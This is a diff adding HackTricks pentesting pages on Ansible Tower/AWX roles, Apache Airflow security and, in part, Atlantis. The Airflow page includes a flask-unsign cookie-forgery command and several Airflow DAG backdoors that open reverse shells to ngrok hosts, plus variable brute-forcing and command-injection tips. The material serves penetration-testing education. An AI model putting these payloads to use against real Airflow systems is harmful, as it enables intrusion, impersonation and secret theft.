+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows. + +**Automation Controller is a newer** version of Ansible Tower with more capabilities. + +### Differences + +According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows. + +### Tech Stack + +* **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. +* **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. +* **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. +* **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. +* **Redis**: Redis serves as a cache and a backend for the task queue. + +### Logical Components + +* **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. 
AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. +* **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. +* **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. +* **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. +* **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. +* **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. +* **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. +* **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. + +### Job Execution Flow + +1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. +2. 
**Job Initiation**: + * The user, via the Web Interface or API, initiates a job based on a **Job Template**. + * The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. + * Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. +3. **Job Queuing**: + * **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. + * **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. +4. **Job Execution**: + * The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. + * Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. + * As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. +5. **Job Results**: + * Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. + * Users can then view the results through the Web Interface or query them via the REST API. + * Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. +6. **External Systems Integration**: + * **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. + * **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. 
+ * **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. + +### AWX lab creation for testing + +[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: + +{% code overflow="wrap" %} +```bash +git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version + +cd awx + +# Build +make docker-compose-build + +# Run +make docker-compose + +# Or to create a more complex env +MAIN_NODE_TYPE=control EXECUTION_NODE_COUNT=2 COMPOSE_TAG=devel make docker-compose + +# Clean and build the UI +docker exec tools_awx_1 make clean-ui ui-devel + +# Once migrations are completed and the UI is built, you can begin using AWX. The UI can be reached in your browser at https://localhost:8043/#/home, and the API can be found at https://localhost:8043/api/v2. + +# Create an admin user +docker exec -ti tools_awx_1 awx-manage createsuperuser + +# Load demo data +docker exec tools_awx_1 awx-manage create_preload_data +``` +{% endcode %} + +## RBAC + +### Supported roles + +The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**. + +From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one. + +
+ +Expand this to get detailed description of available roles + +1. **System Administrator**: + * This is the superuser role with permissions to access and modify any resource in the system. + * They can manage all organizations, teams, projects, inventories, job templates, etc. +2. **System Auditor**: + * Users with this role can view all system data but cannot make any changes. + * This role is designed for compliance and oversight. +3. **Organization Roles**: + * **Admin**: Full control over the organization's resources. + * **Auditor**: View-only access to the organization's resources. + * **Member**: Basic membership in an organization without any specific permissions. + * **Execute**: Can run job templates within the organization. + * **Read**: Can view the organization’s resources. +4. **Project Roles**: + * **Admin**: Can manage and modify the project. + * **Use**: Can use the project in a job template. + * **Update**: Can update project using SCM (source control). +5. **Inventory Roles**: + * **Admin**: Can manage and modify the inventory. + * **Ad Hoc**: Can run ad hoc commands on the inventory. + * **Update**: Can update the inventory source. + * **Use**: Can use the inventory in a job template. + * **Read**: View-only access. +6. **Job Template Roles**: + * **Admin**: Can manage and modify the job template. + * **Execute**: Can run the job. + * **Read**: View-only access. +7. **Credential Roles**: + * **Admin**: Can manage and modify the credentials. + * **Use**: Can use the credentials in job templates or other relevant resources. + * **Read**: View-only access. +8. **Team Roles**: + * **Member**: Part of the team but without any specific permissions. + * **Admin**: Can manage the team's members and associated resources. +9. **Workflow Roles**: + * **Admin**: Can manage and modify the workflow. + * **Execute**: Can run the workflow. + * **Read**: View-only access. + +
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/pentesting-ci-cd/apache-airflow-security/README.md new file mode 100644 index 0000000000..fac6233fbf --- /dev/null +++ b/pentesting-ci-cd/apache-airflow-security/README.md @@ -0,0 +1,201 @@ +# Apache Airflow Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Basic Information + +[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. + +Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**. + +### Local Lab + +#### Docker-Compose + +You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). 
+ +#### Minikube + +One easy way to **run apache airflo**w is to run it **with minikube**: + +```bash +helm repo add airflow-stable https://airflow-helm.github.io/charts +helm repo update +helm install airflow-release airflow-stable/airflow +# Some information about how to aceess the web console will appear after this command + +# Use this command to delete it +helm delete airflow-release +``` + +### Airflow Configuration + +Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: + +{% content-ref url="airflow-configuration.md" %} +[airflow-configuration.md](airflow-configuration.md) +{% endcontent-ref %} + +### Airflow RBAC + +Before start attacking Airflow you should understand **how permissions work**: + +{% content-ref url="airflow-rbac.md" %} +[airflow-rbac.md](airflow-rbac.md) +{% endcontent-ref %} + +### Attacks + +#### Web Console Enumeration + +If you have **access to the web console** you might be able to access some or all of the following information: + +* **Variables** (Custom sensitive information might be stored here) +* **Connections** (Custom sensitive information might be stored here) + * Access them in `http:///connection/list/` +* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) +* List **users & roles** +* **Code of each DAG** (which might contain interesting info) + +#### Retrieve Variables Values + +Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ +Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. 
+ +![](<../../.gitbook/assets/image (164).png>) + +However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ +To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ +Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: + +![](<../../.gitbook/assets/image (152).png>) + +#### Privilege Escalation + +If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. + +```bash +flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" +``` + +#### DAG Backdoor (RCE in Airflow worker) + +If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ +Note that this reverse shell is going to be executed inside an **airflow worker container**: + +```python +import pendulum +from airflow import DAG +from airflow.operators.bash import BashOperator + +with DAG( + dag_id='rev_shell_bash', + schedule_interval='0 0 * * *', + start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +) as dag: + run = BashOperator( + task_id='run', + bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', + ) +``` + +```python +import pendulum, socket, os, pty +from airflow import DAG +from airflow.operators.python 
import PythonOperator + +def rs(rhost, port): + s = socket.socket() + s.connect((rhost, port)) + [os.dup2(s.fileno(),fd) for fd in (0,1,2)] + pty.spawn("/bin/sh") + +with DAG( + dag_id='rev_shell_python', + schedule_interval='0 0 * * *', + start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +) as dag: + run = PythonOperator( + task_id='rs_python', + python_callable=rs, + op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} + ) +``` + +#### DAG Backdoor (RCE in Airflow scheduler) + +If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. + +```python +import pendulum, socket, os, pty +from airflow import DAG +from airflow.operators.python import PythonOperator + +def rs(rhost, port): + s = socket.socket() + s.connect((rhost, port)) + [os.dup2(s.fileno(),fd) for fd in (0,1,2)] + pty.spawn("/bin/sh") + +rs("2.tcp.ngrok.io", 14403) + +with DAG( + dag_id='rev_shell_python2', + schedule_interval='0 0 * * *', + start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +) as dag: + run = PythonOperator( + task_id='rs_python2', + python_callable=rs, + op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} +``` + +#### DAG Creation + +If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. + +#### DAG Code Injection + +When you execute a DAG from the GUI you can **pass arguments** to it.\ +Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\ +That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) + +All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**. 
+ +Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**: + +```python +from airflow.models import Variable +[...] +foo = Variable.get("foo") +``` + +If they are used for example inside a a bash command, you could perform a command injection. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md new file mode 100644 index 0000000000..2508f970fc --- /dev/null +++ b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md @@ -0,0 +1,137 @@ +# Airflow Configuration + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Configuration File + +**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** + +**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** + +Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. + +If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ +If you have **access to some machine inside the airflow env**, check the **environment**. + +Some interesting values to check when reading the config file: + +### \[api] + +* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** +* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** +* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** +* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: + * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API + * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication + * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** + * `airflow.api.auth.backend.basic_auth`: For **basic authentication** + * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). 
+ * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). + * You can also **create you own authentication** method with python. +* **`google_key_path`:** Path to the **GCP service account key** + +### **\[atlas]** + +* **`password`**: Atlas password +* **`username`**: Atlas username + +### \[celery] + +* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) +* **`result_backend`**: Postgres url which may contain **credentials**. +* **`ssl_cacert`**: Path to the cacert +* **`ssl_cert`**: Path to the cert +* **`ssl_key`**: Path to the key + +### \[core] + +* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. +* **`fernet_key`**: Key to store encrypted variables (symmetric) +* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. +* **`security`**: What security module to use (for example kerberos) + +### \[dask] + +* **`tls_ca`**: Path to ca +* **`tls_cert`**: Part to the cert +* **`tls_key`**: Part to the tls key + +### \[kerberos] + +* **`ccache`**: Path to ccache file +* **`forwardable`**: Enabled by default + +### \[logging] + +* **`google_key_path`**: Path to GCP JSON creds. + +### \[secrets] + +* **`backend`**: Full class name of secrets backend to enable +* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. 
+ +### \[smtp] + +* **`smtp_password`**: SMTP password +* **`smtp_user`**: SMTP user + +### \[webserver] + +* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value +* **`cookie_secure`**: Set **secure flag** on the the session cookie +* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** +* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) +* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) +* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** +* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** +* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible + +### Web Authentication + +By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as + +```bash +AUTH_TYPE = AUTH_DB +``` + +Which means that the **authentication is checked against the database**. However, other configurations are possible like + +```bash +AUTH_TYPE = AUTH_OAUTH +``` + +To leave the **authentication to third party services**. + +However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: + +```bash +AUTH_ROLE_PUBLIC = 'Admin' +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md new file mode 100644 index 0000000000..94580b7b0d --- /dev/null +++ b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -0,0 +1,69 @@ +# Airflow RBAC + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## RBAC + +(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. + +* **`Admin`** users have all possible permissions. +* **`Public`** users (anonymous) don’t have any permissions. +* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** +* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** +* **`Op`** users have `User` permissions plus additional op permissions. + +Note that **admin** users can **create more roles** with more **granular permissions**. + +Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. 
+ +### Default Permissions + +These are the default permissions per default role: + +* **Admin** + +\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, 
menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] + +* **Op** + +\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] + +* **User** + +\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can 
edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] + +* **Viewer** + +\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] + +* **Public** + +\[] + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/atlantis-security.md b/pentesting-ci-cd/atlantis-security.md new file mode 100644 index 0000000000..a82b0d255e --- /dev/null +++ b/pentesting-ci-cd/atlantis-security.md @@ -0,0 +1,422 @@ +# Atlantis Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Basic Information + +Atlantis basically helps you to to run terraform from Pull Requests from your git server. + +![](<../.gitbook/assets/image (161).png>) + +### Local Lab + +1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. +2. Create a **personal token** (with repo access) of your **github** user +3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** + 1. You can access the web page in 127.0.0.1:4141 + +### Atlantis Access + +#### Git Server Credentials + +**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ +However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ +[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. + +{% hint style="warning" %} +In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. +{% endhint %} + +#### Webhooks + +Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. + +One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. + +Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. + +{% hint style="warning" %} +Atlantis is going to be **exposing webhooks** so the git server can send it information. 
